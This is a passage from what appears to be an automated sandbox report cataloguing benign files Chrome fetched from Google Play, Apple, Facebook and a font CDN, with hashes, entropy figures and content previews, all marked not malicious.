                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=xI1uef"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.fT=function(a,b,c,d,e,f,g,h){return(0,_.P)('<span class="'+_.T("DPvwYc")+(h?" "+_.T("sm8sCf"):"")+(g?" "+_.T(g):"")+'"'+(c?' title="'+_.T(c)+'"':"")+(b?' aria-label="'+_.T(_.Ro(b))+'"':"")+((c||b)&&e?' role="'+_.T(e)+'"':"")+(c||b?"":' aria-hidden="true"')+(d?' jsname="'+_.T(d)+'"':"")+(f?_.Vo(_.Uo(f)):"")+">"+_.Q(a)+"</span>")};.var MRc,ORc,NRc;._.PRc=function(a,b){const c=a.card;var d=a.dg,e=a.Aa,f=_.P,g=a.qa,h=_.Iq(c.Fa()),k=_.P,m=_.P,n='<div class="'+_.T("Vpfmgd")+'"><div class="'+_.T("uzcko")+'">',q=_.P;e=""+MRc(b,_.F(_.F(_.Z5(c),_.U5,2),_.ct,1),_.yh(_.Z5(c),4),"yNWQ8e",_.yh(_.Y5(c),1),e.H(),_.yh(_.Z5(c),3))+MRc(b,_.F(_.F(_.Z5(c),_.U5,2),_.ct,3),_.yh(_.Z5(c),4),"ZYyTud",_.yh(_.Y5(c),3),e.H(),_.yh(_.Z5(c),3))+MRc(b,_.F(_.F(_.Z5(c),_.U5,2),_.ct,2),_.yh(_.Z5(c),4),"kJ9uy",_.yh(_.Y5(c),2),e.H(),_.yh(_.Z5(c),3));if(c?.Sg()?.N()===1){var t=.'<span class="'+_.T("VKNo5")+'">';t=(0,_.P)(
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60476
                                                                                                                                                                                                                                  Entropy (8bit):7.993110142611454
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:zS8qpTxxqzhkOlrZHy4MKEl4A4BwM/EzYSr/TaKzYp8gQoi058SHc0lT5fKTee8u:zS8qtqzHRlyAElUieE0SA8gqA8SHrQL7
                                                                                                                                                                                                                                  MD5:4BC38B50B6C612518D5F544E36B32024
                                                                                                                                                                                                                                  SHA1:DA8CA87C9238FDC8EB3316C65A8202467FAD4015
                                                                                                                                                                                                                                  SHA-256:C45F8416C8EF731EFEAC53F0582A8DEF797F9159E5277BFB311A729723722A76
                                                                                                                                                                                                                                  SHA-512:952033583F2E3F9BDBC1205309702AB03723F5EA22B32CB90BCA7E7D6303ED4975B4F93B5BB62DA2EC09E6B95081D090408EDD28D71CA45D3E1724827BD73A76
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF4...WEBPVP8X..............VP8L..../..2.M.l.n.`-...u0...K..|G.....~....q...:..,...2...E.C..o...8.~.........../8..C....!.......C. .d..P.XK..0.....@.3A......@.)``.m..vT..(Pn..,.%..6.b..u...f.....7|.~SO.)....vS.z?..u/..3f...r.Z..-}=.2.w.^........R...f...R...~G....T.k..r....>.^.rJ..].....y.S.....lK.X.U..\=4..w+.Y.).._.;.......^*D.....9...ms[I.B..1..lLQ..=9..t5+.%...*.l.0.0B.BP.mm.<.$3......Y....d...N"...O..o.P......<..]....:!..4.B........*......>.L._..wUwUw......._...._6+..W.~..6.|.u.....gz.L....Wz.L.|...z.B.|.?.Z>.]U.KK...^$;.....P......^>..g*..3E.}..^..'....Z>...k.I.Y%%Y.,.,.....VV.@......*..=.....@f./.X..=....;....s......@.....<. ...@..L.....W`.r..q.q.8........d$.@AF62 ..@ #...^.2.Q....@<....p....8h..)...<..M....@.....#..2............OW&.3......T..*R.......w.f....P...P...".....Y.^4.1..O...z..@.#0..;6.......;<<..|.....q...\..[...*B.#..../.#...m}nT..g. .' ....rZ.i....U.gE.XzJ.[<.t5s..j....9.|..Sl...8.7.....}w..]v.........~..VM.%.a0..q..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10204), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10204
                                                                                                                                                                                                                                  Entropy (8bit):5.282533445396263
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:U38kcmi3U2hQctc1cJcpcZrEccxNsMlcTctcIceCgycLcvXRkEsYNtGr:U38ZZU2hxtc1cJcpclEHllcTctcIc3gP
                                                                                                                                                                                                                                  MD5:97E3F38781BA136C719D08CA0EC5162F
                                                                                                                                                                                                                                  SHA1:5604E5C9095068500FD764E4E7608CD489D272CC
                                                                                                                                                                                                                                  SHA-256:9DC2DC3E987AC76A2AE4DCC3A4DE7BF5D09DEACD4780C9F8BA7EC263380809CF
                                                                                                                                                                                                                                  SHA-512:0716DD98795D9184A7A1508B87F9D17FAE217CC0364D42D075AF5D4C6BC1FD37E6FC07C4F6798D96AF028608075666D133C15977F38F8748421586BB9833E507
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/global-elements/2426.0.0/en_UZ/ac-global-footer.97e3f38781ba136c719d08ca0ec5162f.js
                                                                                                                                                                                                                                  Preview:!function t(e,i,n){function s(o,r){if(!i[o]){if(!e[o]){var l="function"==typeof require&&require;if(!r&&l)return l(o,!0);if(a)return a(o,!0);var c=new Error("Cannot find module '"+o+"'");throw c.code="MODULE_NOT_FOUND",c}var h=i[o]={exports:{}};e[o][0].call(h.exports,(function(t){return s(e[o][1][t]||t)}),h,h.exports,t,e,i,n)}return i[o].exports}for(var a="function"==typeof require&&require,o=0;o<n.length;o++)s(n[o]);return s}({1:[function(t,e,i){"use strict";e.exports={EventEmitterMicro:t(2)}},{2:2}],2:[function(t,e,i){"use strict";function n(){this._events={}}let s=n.prototype;s.on=function(t,e){return this._events[t]=this._events[t]||[],this._events[t].unshift(e),e},s.once=function(t,e){let i=this;return this.on(t,(function n(s){i.off(t,n),void 0!==s?e(s):e()}))},s.off=function(t,e){if(!this.has(t))return;if(1===arguments.length)return this._events[t]=null,void delete this._events[t];let i=this._events[t].indexOf(e);-1!==i&&this._events[t].splice(i,1)},s.trigger=function(t,e){if(thi
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (4739)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):6156
                                                                                                                                                                                                                                  Entropy (8bit):5.35625511599146
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:XmZ9kbptGzE4rTGqlBV5l5/IiNSZ1HPyy0KjEL2VcI:XmZ9kbGzEG5lBVL+iI2yljg6cI
                                                                                                                                                                                                                                  MD5:C4CD29E090B8BB37F44EAE73DCFB0ABC
                                                                                                                                                                                                                                  SHA1:6440CEF9A4CCD7198FCD669F775FAE65B52E63CD
                                                                                                                                                                                                                                  SHA-256:1AF4A64548B3003042221EE0B21D889FD6420CCF1A981A1122DEE5FACE97E4B3
                                                                                                                                                                                                                                  SHA-512:0363DAA966E9D41C9235C67C13C261BE41C3C5D513838CF328824F84385C1B5D3FEFCF54EA8E3FD9BAF9E1A48B671F15090D51089F6561E471B85549724ED446
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/BTdUGzsTGVy.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("DOMControl",["$","DataStore"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this.root=b("$").fromIDOrElement(a),this.updating=!1,b("DataStore").set(a,"DOMControl",this)}var c=a.prototype;c.getRoot=function(){return this.root};c.beginUpdate=function(){if(this.updating)return!1;this.updating=!0;return!0};c.endUpdate=function(){this.updating=!1};c.update=function(a){if(!this.beginUpdate())return this;this.onupdate(a);this.endUpdate()};c.onupdate=function(a){};a.getInstance=function(a){return b("DataStore").get(a,"DOMControl")};return a}();e.exports=a}),null);.__d("Input",["CSS","DOMControl","DOMQuery"],(function(a,b,c,d,e,f,g){function h(a){return!/\S/.test(a||"")}function i(a){return h(a.value)}function a(a){return i(a)?"":a.value}function b(a){return a.value}function e(a,b){a.value=b||"";b=c("DOMControl").getInstance(a);b&&b.resetHeight&&b.resetHeight()}function f(a,b){b||(b=""),a.setAttribute("aria-label",b),a.setAttribute("placeholder",b)}funct
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2992)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):14624
                                                                                                                                                                                                                                  Entropy (8bit):5.37945237272042
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jHrDs7bWXlMH+IBJHxPXqgY9uMM6GK3sLS6Fw6c0rGseCu:jH83/EbNMuso6eCu
                                                                                                                                                                                                                                  MD5:451B306149A87391201CEFBA76C2D722
                                                                                                                                                                                                                                  SHA1:3ACE4A5BC392A242AE41B05A20855AE6854E092C
                                                                                                                                                                                                                                  SHA-256:84DEC8C0B0F0931D9E02A1CEAE479FE6D652396D332A79148932A1F65D412EFC
                                                                                                                                                                                                                                  SHA-512:074B7292127EE19D7B77A4A79C569B59CFFEADCF62B4947F1CEB83F948CAE4FB2D2C2DB830FDDB93E66DE66CE7DF2234DD51210554A1B466F467EC993770738A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iEm34/yf/l/en_GB/M9F-Jw7q3uo.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("BUIAdoptionUtils",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function a(a){switch(a){case"small":case"medium":return"small";case"large":return"medium";case"xlarge":case"xxlarge":return"large";case void 0:return void 0;default:h(0,11814,a)}}function b(a){switch(a){case"success":return"success";case"notify":return"information";case"recommend":return"warning";case"warn":return"error";case"quiet":return"information";case void 0:return void 0;default:h(0,11815,a)}}function c(a){return function(b){return a({value:b})}}g.convertSizeToFDSSize=a;g.convertUseToType=b;g.convertSelectorXUIOnChangeToSUIOnChange=c}),98);.__d("ImagePositioner.react",["clamp","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");a=function(a){babelHelpers.inheritsLoose(b,a);function b(){var b,d;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(b=d=a.call.apply(a,[this].concat(f))||this,d.$2=function(a,b,c){var d=parseFloat(a),e=a.substr(d.t
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (664)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):14214
                                                                                                                                                                                                                                  Entropy (8bit):5.423098025111413
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5Ou495s6yYMkJqYWJ+Jaucgd/ix0BSc1e6t44KfKb6m3PbBISj:5BVuqYWJ+Jauld/g0BS56t4IuoPlISj
                                                                                                                                                                                                                                  MD5:853877426A53490ADEDBCB2E1CE9624E
                                                                                                                                                                                                                                  SHA1:BA2E275A1C0148B2F12CA53F17746BB920B7D555
                                                                                                                                                                                                                                  SHA-256:F3163FB2E48B27F81ECCDB331EEBD4F05AEAF9AF7253765323A35E869D8E5D6B
                                                                                                                                                                                                                                  SHA-512:12368317D1C18BD215ACB20B1D4EB859C72A7DA8FBD8299348E2D5A462EBE57BC015748330C4C1E07FF5404CEBE61B1A228145F9748D92C12DD2B00346AC910E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.572.93058cb1137c31242bbc.js
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[572],{24178:function(e,t,n){n.d(t,{BU:function(){return J},EE:function(){return q},GP:function(){return H},L5:function(){return Z},P0:function(){return R},Qk:function(){return B},SC:function(){return O},Z_:function(){return X},tO:function(){return ce},vc:function(){return k},wr:function(){return oe}}).var r={setDelegate:!0}.function o(e){return void 0!==e}function i(e){return o(e)&&null!==e}function a(e){return d(e)&&0===e.length}function u(e){return v(e)&&0===e.length}function s(e){return p(e)&&0===Object.keys(e).length}function l(e){return"function"==typeof e}function c(e){return"number"==typeof e}function f(e){return c(e)&&e%1==0}function d(e){return"string"==typeof e||e instanceof String}function v(e){return!!e&&e.constructor===Array}function p(e){return!!e&&e.constructor===Object}function h(e){return p(e)&&l(e.__lookupGetter__)&&l(e.__lookupSetter__)&&l(e.__defineGetter__)&&l(e.__de
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21773
                                                                                                                                                                                                                                  Entropy (8bit):7.954465641727542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+10Ekzqs4P5i/D1nO4Ixi1Ivc0JKiyMHXLnaZ38zE2kic:+10Nzr4P5i/NyB04ZbaNWEpic
                                                                                                                                                                                                                                  MD5:64F1E3012F9A355E80B09E0114962619
                                                                                                                                                                                                                                  SHA1:9EF01FC4267FAA6BBA7343EB1842D816254AF3D7
                                                                                                                                                                                                                                  SHA-256:8D8FA69C8671B80030FC638E8532CBCF8CEF8158D4CAA2B69EF31F09544352CB
                                                                                                                                                                                                                                  SHA-512:93F8A2351AD8DB3F9E5E74E9112A8394D0E89169A87E644F016C15BA95578BE8C5514AC1BA16B03FA98DEFD9AE750D4AFCB57411CFAC9C41CC98677DE64D6C04
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:......JFIF............................."-%""""*(-'%.'100.--5=PB78K9--EaEKSV[\[5AemdXlPY[W......./..0W?9?WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......h....".......................................L........................!1.AQaq..."....2BR.....r#Sb....$3C......cs...4.5Td..............................,.......................!1.A.Q"a.2#Bq....3R............?.......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B.....f..O.....u..|..&....:7[...Jc....\....)..[....._....$......jS..$-..F.}.\...[.I....(S9...t........!.+_.(|O.T.g,....l.e....?........b.9$.....~...?.U?.v..R.....U...M...Hz.j.e....j...i..Q.....!.[./..B..IZ=.?.......k...f#.?.VS...%.9D.........?.G.sm.m....T.........?.............b..B.?..o.l.......sm.m...........-..K?....D..._.,........r.]w.ul.m..........O...9........,.....S..j...?.K'VsH]..:...........~...-..9.....i...N
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):6111
                                                                                                                                                                                                                                  Entropy (8bit):5.3068318467116855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kfrWTm7TqTQT/TyTJTJTXTfTzTWTNTHT6TffT2TjTlsTwTITfTB4THeTeT4T+Tp4:WyTITqTQT/TyTJTJTXTfTzTWTNTHT6Tp
                                                                                                                                                                                                                                  MD5:0E8F7A66A07293C2B1E9343258E7397A
                                                                                                                                                                                                                                  SHA1:74B0FB85B2FAA1CC2AB66492221B7716A02ED82D
                                                                                                                                                                                                                                  SHA-256:940FAF99D48D2113AE72AC1C03CBA52892B6BE91683F8888BEEE3FB94A80ADA8
                                                                                                                                                                                                                                  SHA-512:FAD6B94C0417C6FA55BFD4A18697F372218E6D1386B9AA72A07E081EE1D3C63F9930A120126E28369A7F2D581150D3F4D3EF8C353395E1302BA8CA329257847D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/14/d0/cf/14d0cf5e-72c7-1df3-011c-650969172076/P875466468_Anull_trickPlay_gr230_sdr_398x862_iframes.m3u8
                                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-TARGETDURATION:10.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-I-FRAMES-ONLY.#EXT-X-MAP:URI="P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4",BYTERANGE="897@0".#EXTINF:0.50000,..#EXT-X-BYTERANGE:23931@897.P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:25148@24828.P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:25587@49976.P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:24715@75563.P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:22848@100278.P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:23263@123126.P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:25681@146389.P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:22813@172070.P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4.#EXTINF:0.50000,.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 117852, version 773.1280
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):117852
                                                                                                                                                                                                                                  Entropy (8bit):7.99152799541038
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:3072:Rs3c1iEht0b6W85CbPgRgaCMtsWOwydzrCyzhRaLZTBlZsEmOQadt:RDik3CzS8MtDOw+XaXZ8Of
                                                                                                                                                                                                                                  MD5:B55B1345F0B919F0CAB774EC25D6654E
                                                                                                                                                                                                                                  SHA1:C39DD7C713983702DE91B08AE00B194B0BDB9008
                                                                                                                                                                                                                                  SHA-256:232C6F6A7678304F9EFAA26F30B1610DEBC2BA9F4CD636B5E6751C8D73761B92
                                                                                                                                                                                                                                  SHA-512:793756B3BF0E21181D06F44593A99A1986B90DB4704F4765D4A1E8937ACF3D1D38A750C6D6082545BBC80C04FC8DC03DA5AB2B4A3F31B7F2345751050DF115FB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/webfonts/fa-brands-400.woff2
                                                                                                                                                                                                                                  Preview:wOF2.......\.......e.............................6.$. .`..l..:..8.p.... %2.q...<.....eDOZ-..UUU.......~..7........?........v\.7..7....."..)..#.r.z.....S..+.].-.%.2./.{..&..D.|'F.+e.. ._/.". O...sP.....;}.U...'VH...P.6`...".1.......+.K.O...S..T..R...dK..l).!'..M............g..@.%.#..8l.<..f...............j....sf....A,i`0.$A&4........%dc.l .tb...P.9_.}fF#.2&..r.6.%.I...+Z.>"..`E....'.Z?o43.....(Kr..l.r.M..`..M{].,c/G...G.C....U.wU.[u..7.L.L..n..%..r.I2..X.)...v...s.7...1..BU.}..]..`Q:A. EB..!V.-9....\\R.}../.z.K....$...Z.a.ge".O56Vc..+g..t.....F.k'V....50.......$&..D.....d...J4..n....L.C&'3....].k4......._(..G...n.h.U...>.>_..<..yD.<"s..G.......=.Y...X..Ym ...b...@6...f..@......h6...OpD...l..Ue ..(a6d+Y..Q.5J,..b7.....Z..z.b5..lVR...P....5q!...*c...)>,.I.*...-_...X.<.p.#tM.......l{...yC..4..$...O....dS&.o.N....i..8...`4.]...l...=^.f........^.x.v|..YNo.B..W....~../...J...Nk.=c-.}....@..g.Y9...:.l.?..M\.#...y.......!.....k.Y....t.".|I.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10672)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):25512
                                                                                                                                                                                                                                  Entropy (8bit):5.5380769875937625
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E6W9FDn62dhKmyqkXZ0XhnDGZjTVr1nDdU6DQGMq9wHAY:6FDn6HPZSahBvDQGMq8f
                                                                                                                                                                                                                                  MD5:2F4D956ECEAB1D26E4CA599AFA43C5AB
                                                                                                                                                                                                                                  SHA1:162DA72F1DAA41895100BC9D27690211C1B10637
                                                                                                                                                                                                                                  SHA-256:2B4E3CBEB334AC5E6ED008EAE87AD245E74C4F4DB1C3BCC0BE192D421E228B03
                                                                                                                                                                                                                                  SHA-512:DFE0E85011451E31217F5C5B0EB70C6F054398B90A4C1024364ABECDC60DE02BE7B2A4A98C7569B3E9C0D654D7DEC5E6E4741BBE99BE868005B21423B8E84246
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/1rYlRSL7ILQ.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("color-name-1.1.3",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){g.exports={aliceblue:[240,248,255],antiquewhite:[250,235,215],aqua:[0,255,255],aquamarine:[127,255,212],azure:[240,255,255],beige:[245,245,220],bisque:[255,228,196],black:[0,0,0],blanchedalmond:[255,235,205],blue:[0,0,255],blueviolet:[138,43,226],brown:[165,42,42],burlywood:[222,184,135],cadetblue:[95,158,160],chartreuse:[127,255,0],chocolate:[210,105,30],coral:[255,127,80],cornflowerblue:[100,149,237],cornsilk:[255,248,220],crimson:[220,20,60],cyan:[0,255,255],darkblue:[0,0,139],darkcyan:[0,139,139],darkgoldenrod:[184,134,11],darkgray:[169,169,169],darkgreen:[0,100,0],darkgrey:[169,169,169],darkkhaki:[189,183,107],darkmagenta:[139,0,139],darkolivegreen:[85,107,47],darkorange:[255,140,0],darkorchid:[153,50,204],darkred:[139,0,0],darksalmon:[233,150,122],darkseagreen:[143,188,143],darkslateblue:[72,61
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3792)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9345
                                                                                                                                                                                                                                  Entropy (8bit):5.263985222733283
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:5ncU1ciSTM/JvZLGCfKXuY3tZ8e1hwzTrubXQggbhDU/qFGK31yH0IYuApR2:mUnSTwOoKeiZn1hcwYDPFGK3g0HS
                                                                                                                                                                                                                                  MD5:789920D64701571A8C9CC2C0A333661D
                                                                                                                                                                                                                                  SHA1:5798B3B67D8B929875F4A006518ADBECFC331206
                                                                                                                                                                                                                                  SHA-256:60382F476A01A84BE86A0B2CC5743185FC9E1F4FB378C13EDA734132EFCDB295
                                                                                                                                                                                                                                  SHA-512:77C981AF5E2FDC8DC0FB51CD45F2C9ECB6C90D453A66B43C3C905785AE52E832BC0B21A891283D085407F822295DED0DA5A1B5E2852FB6CA8243409A48BE35EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/KO2irUskl3Y.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsToggleSource",["keyMirror"],(function(a,b,c,d,e,f,g){"use strict";a=c("keyMirror")({action_bar_button:null,action_column_cell:null,automated_brand_lift_opt_in:null,cm_tip:null,copy:null,create:null,drawer_button:null,draft_indicator_table_cell:null,dropdown_button:null,edit_button:null,editor_footer:null,editor_publish:null,external_quick_create:null,full_funnel_strategy_dialog:null,ig_login_ig_boosted_post_unsupported_error_banner:null,inline_publish_cta:null,insights_button:null,investigate_cta:null,keyboard_escape:null,keyboard_shortcut:null,lightweight_attribution_campaign_name:null,midflight_recs_resolution_card:null,onenav_tab:null,perf_summary_tip:null,reach_frequency_dialog:null,secondary_view_close_button:null,secondary_view_switcher:null,signal_loss_limits_card:null,split_test_convergence_tip:null,split_test_dialog:null,split_test_opted_in_campaign_group_published:null,split_test_draft_publish_prompt:null,split_test_beaker_icon_tooltip:null,start_yo
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):536
                                                                                                                                                                                                                                  Entropy (8bit):7.52888291256493
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:glPvZ8rMPc9PI50zUF799AGR/DinkhVj62pqJCI9tv2wsgDMnpR:ACrMQUF799/hDinknj6yI9tuwfQnv
                                                                                                                                                                                                                                  MD5:42FA2E158D0BDDE364A460615B6882B2
                                                                                                                                                                                                                                  SHA1:AAA3FF44AFCBE137C7260BD325B8A9AE82EF1709
                                                                                                                                                                                                                                  SHA-256:F5C01B13D872E242577860F4BDF541651594BB4FF7B7F4863DD149E78F33D52D
